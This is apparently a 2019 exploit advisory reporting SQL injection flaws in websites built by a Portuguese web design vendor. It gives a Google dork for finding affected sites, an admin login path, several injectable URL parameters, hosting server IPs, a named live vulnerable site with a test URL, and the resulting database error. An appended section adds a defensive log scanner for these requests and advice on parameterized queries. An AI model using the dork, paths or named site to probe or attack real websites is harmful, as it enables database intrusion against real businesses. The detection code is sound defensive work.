- ############################################################
- # Exploit Title : Development Netgócio.pt ® Portugal Web Design SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 11/01/2019
- # Vendor Homepage : netgocio.pt
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''Development Netgócio ®'' site:pt
- # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
- ############################################################
- # Admin Panel Login Path :
- *************************
- /area-reservada.php
- # SQL Injection Exploit :
- ***********************
- /comentarios.php?id=[SQL Injection]
- /pedir_avaliacao.php?id=
- /biblioteca-popup.php?id=[ID-NUMBER]&cat=[ID-NUMBER]&prod=[ID-NUMBER]&bib=[SQL Injection]
- /biblioteca-popup.php?id=[ID-NUMBER]&cat=[ID-NUMBER]&prod=[SQL Injection]
- /loja-online-retomas.php?id=[SQL Injection]
- ############################################################
- # Example Vulnerable Site :
- *************************
- Note : (185.2.4.101) => There are 691 domains hosted on this server.
- Note : (94.126.168.68) => There are 245 domains hosted on this server.
- [+] mobilitec.pt/comentarios.php?id=424%27 =>
- [ Proof of Concept ] => archive.fo/UCtWZ
- ############################################################
- # SQL Database Error :
- **********************
- You have an error in your SQL syntax; check the manual
- that corresponds to your MySQL server version for the
- right syntax to use near '1' ORDER BY id DESC' at line 1
- ############################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################
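
A defender-side check for the requests listed above, as an added example that is not part of the original paste: it scans web access log lines for hits on the listed scripts where `id`, `cat`, `prod` or `bib` is not a plain integer. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and numeric parameters named in the advisory above.
WATCHED = {
    "/comentarios.php": {"id"},
    "/pedir_avaliacao.php": {"id"},
    "/biblioteca-popup.php": {"id", "cat", "prod", "bib"},
    "/loja-online-retomas.php": {"id"},
}
# Assumption: Apache/nginx combined log format; only the request line is parsed.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return sorted (param, decoded value) pairs that are not plain integers."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path not in WATCHED:
        return []
    hits = []
    # parse_qsl percent-decodes values, so %27 is seen as a quote character.
    # Blank values are kept: an empty id is not a plain integer either.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in WATCHED[url.path] and not re.fullmatch(r"[0-9]{1,10}", value):
            hits.append((name, value))
    return sorted(hits)

# Constructed sample lines (documentation addresses, hypothetical values).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jan/2019:10:00:01 +0000] "GET /comentarios.php?id=424 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Jan/2019:10:00:07 +0000] "GET /comentarios.php?id=424%27 HTTP/1.1" 200 311',
    '192.0.2.44 - - [11/Jan/2019:10:00:09 +0000] "GET /biblioteca-popup.php?id=3&cat=2&prod=7&bib=1%27 HTTP/1.1" 200 298',
    '192.0.2.10 - - [11/Jan/2019:10:00:12 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
]

def scan(lines):
    """Map line index -> offending parameters for lines worth reviewing."""
    return {i: hits for i, line in enumerate(lines) if (hits := suspicious_params(line))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

Flagged lines only show that the parameters were probed; the fix is in the scripts themselves, by binding these values through parameterized queries or casting them to integers before they reach the SQL statement.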